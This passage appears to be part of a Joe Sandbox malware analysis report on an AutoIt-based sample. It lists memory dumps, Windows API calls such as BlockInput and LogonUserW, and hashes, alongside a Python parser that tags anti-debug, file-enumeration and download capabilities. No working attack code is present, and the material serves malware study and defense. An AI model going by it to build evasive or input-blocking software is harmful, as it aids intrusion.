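• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
"""

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall
# function ADDR:" when the report attributes the call to a callee. Of the
# Similarity fields only three are kept; "Instruction Fuzzy Hash" always ends a record.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>API ID|Opcode ID|Instruction Fuzzy Hash):\s*(?P<val>.*)$")

# Assumed API-to-capability mapping (not a Joe Sandbox feature); extend per sample.
CAPABILITY_APIS = {
    "anti-debug": {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"},
    "file-enumeration": {"GetFileAttributesW", "FindFirstFileW", "FindNextFileW"},
    "wininet-download": {"InternetQueryDataAvailable", "InternetReadFile", "InternetOpenUrlW"},
}

@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                       # call-site address inside the dump
    subcall_of: str | None = None  # callee address when attributed to a subcall

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)
    api_id: str = ""
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    @property
    def apis(self) -> list[str]:
        return [c.api for c in self.calls]

def parse_records(text: str) -> list[FunctionRecord]:
    """A record opens at an "APIs"/"Strings" header and closes at its fuzzy hash."""
    records, cur = [], None
    for line in text.splitlines():
        if cur is None:
            if line.strip() in ("APIs", "Strings"):
                cur = FunctionRecord()
                records.append(cur)
            continue
        if m := API_RE.match(line):
            cur.calls.append(ApiCall(m["api"], m["mod"], m["ref"], m["sub"]))
        elif m := FIELD_RE.match(line):
            key, val = m["key"], m["val"].strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "Opcode ID":
                cur.opcode_id = val
            else:
                cur.instruction_fuzzy_hash = val
                cur = None  # record complete
    return records

def capabilities(rec: FunctionRecord) -> list[str]:
    """Tags whose API set intersects the record's direct and subcall APIs."""
    names = set(rec.apis)
    return sorted(tag for tag, apis in CAPABILITY_APIS.items() if names & apis)

def triage(text: str) -> list[dict]:
    """One row per record: first call site, API chain, tags, opcode-id prefix."""
    return [{"entry": r.calls[0].ref if r.calls else "-",
             "apis": " -> ".join(r.apis),
             "tags": ",".join(capabilities(r)) or "-",
             "opcode_id": r.opcode_id[:12]} for r in parse_records(text)]

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(f"{row['entry']}  {row['tags']:18} {row['opcode_id']}  {row['apis']}")
```

Subcall attributions are kept as ordinary calls with `subcall_of` set, so the GetLastError reached through 004422CB still counts toward the function's API set; records whose only content is a "Strings" header (as several on this page) parse to an empty call list and no tags, which is the right result rather than an error. Opcode ID prefixes are carried so rows can be matched against the full identifiers in the report.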
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID: U$\
• API String ID: 0-100911408
• Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
• Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
• Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Proc
• String ID:
• API String ID: 2346855178-0
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
• Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
• Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
• Instruction ID: 1b4906d9f21e259b66daec5d2a4723cdb99d299d7388338d70b106eeb17f64f0
• Opcode Fuzzy Hash: ffc2c54a803d8e62ee64ba702a71a0c2ad33d9a94fd471698b382dbafb19470f
• Instruction Fuzzy Hash: 3812C672E106298BDF04CF68E8402EDB7F2FBDC324F65866AD822B7291C7746945CB54
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
• Instruction ID: 0afce909dabaa5e95ec5d1ea5a481b42890bf02549eecc74570a87147bc0db1b
• Opcode Fuzzy Hash: 35f29efe896d92e278ea5730d8026191a9a27f48d539ee70e39862e3a79d8b72
• Instruction Fuzzy Hash: BE12C772E005298BDF04CF68E8406FDB7B2FB9C324F65866AD922B76A0C3756905CB54
APIs
• RaiseException.KERNEL32(?,00000000,00000001,?,00000000,0000FFFF,?,?,0041D021,?,?,?,?,?,?,00000000), ref: 0041CBD2
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
APIs
• BlockInput.USER32(00000001), ref: 0045A38B
Similarity
• API ID: BlockInput
• String ID:
• API String ID: 3456056419-0
APIs
• LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
Similarity
• API ID: LogonUser
• String ID:
• API String ID: 1244722697-0
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00472C51
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
Strings
Similarity
• API ID:
• String ID: h?C
• API String ID: 0-244218268
Strings
Similarity
• API ID:
• String ID: N@
• API String ID: 0-1509896676
                                                                                                                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$FileSystem
                                                                                                                                                                  • String ID: @uJ
                                                                                                                                                                  • API String ID: 2086374402-1268412911
                                                                                                                                                                  • Opcode ID: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                  • Instruction ID: d38707ff02ce459d0d249ce09c4ef886a5fe37698b82f7f0427e65daa233e585
                                                                                                                                                                  • Opcode Fuzzy Hash: f8baac42c5f25f74c7dd853c159356035b8e1d829a17ed988ba9b2caf3e3cd55
                                                                                                                                                                  • Instruction Fuzzy Hash: CB21A2335605108BF320CF37CC01652B7E7EBE5310F358A69E4A5973D1DAB96906CB98
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                                                                  • Instruction ID: 15a88e8b99aa9b3b60ae860545546d836dfae57515e83b1227ad377bd0fa8ebd
                                                                                                                                                                  • Opcode Fuzzy Hash: b9f8e7151bb360a150d620dbba2e541cf4ad8454f726cf584428774d2c7abbef
                                                                                                                                                                  • Instruction Fuzzy Hash: 7F327A71D022198BDF24DFA8C4442EEB7B1FF48315F64812BD816AB384D77889D6CB4A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                                                                  • Instruction ID: 686ba6e61829bfb5abb72d2d432ff8bdc6c7a847d080576bad96759afb44e414
                                                                                                                                                                  • Opcode Fuzzy Hash: dc36756c4c90720edb00318f3353ebec26e6fab343559c239d3e1d39d0ee9d3b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7922AD31E04269CBCF24CFA9E4443EEB7B1FB54301FA4816BE452AB284D73C4986CB19
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                                                                  • Instruction ID: 44b7915538c551888a86dac3e56f37fa477da10fc21367d4c66a1e105d7851d0
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d2c65319ea5eced51c2d0a30bf65eb10718ffd4f554fa4bd04be069a2c73742
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A029033D497B24B8B710FF944D02B77EA05E0179031F46AADEC07F2A6C21AED5696E4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
Memory Dump Source
• Source File: 00000000.00000002.703524933852.0000000004400000.00000040.00000020.00020000.00000000.sdmp, Offset: 04400000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4400000_8EhMjL3yNF.jbxd
APIs
• DeleteObject.GDI32(?), ref: 0045953B
• DeleteObject.GDI32(?), ref: 00459551
• DestroyWindow.USER32(?), ref: 00459563
• GetDesktopWindow.USER32 ref: 00459581
• GetWindowRect.USER32(00000000), ref: 00459588
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
• AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
• CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
• GetClientRect.USER32(00000000,?), ref: 004596F8
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
• CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
• GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
• GlobalLock.KERNEL32(00000000), ref: 0045978F
• ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
• GlobalUnlock.KERNEL32(00000000), ref: 004597A5
• CloseHandle.KERNEL32(00000000), ref: 004597AC
• CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
• OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
• GlobalFree.KERNEL32(00000000), ref: 004597E2
• CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
• SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
• ShowWindow.USER32(?,00000004), ref: 00459865
• CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
• GetStockObject.GDI32(00000011), ref: 004598CD
• SelectObject.GDI32(00000000,00000000), ref: 004598D5
• GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
• DeleteDC.GDI32(00000000), ref: 004598F8
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
• SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
• GetDC.USER32(00000000), ref: 004599FC
• SelectObject.GDI32(00000000,?), ref: 00459A0C
• SelectObject.GDI32(00000000,00000007), ref: 00459A37
• ReleaseDC.USER32(00000000,00000000), ref: 00459A42
• MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
• ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
Strings
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock
                                                                                                                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                  • API String ID: 1538203242-2373415609
                                                                                                                                                                  • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                  • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                  • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                  • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00441874
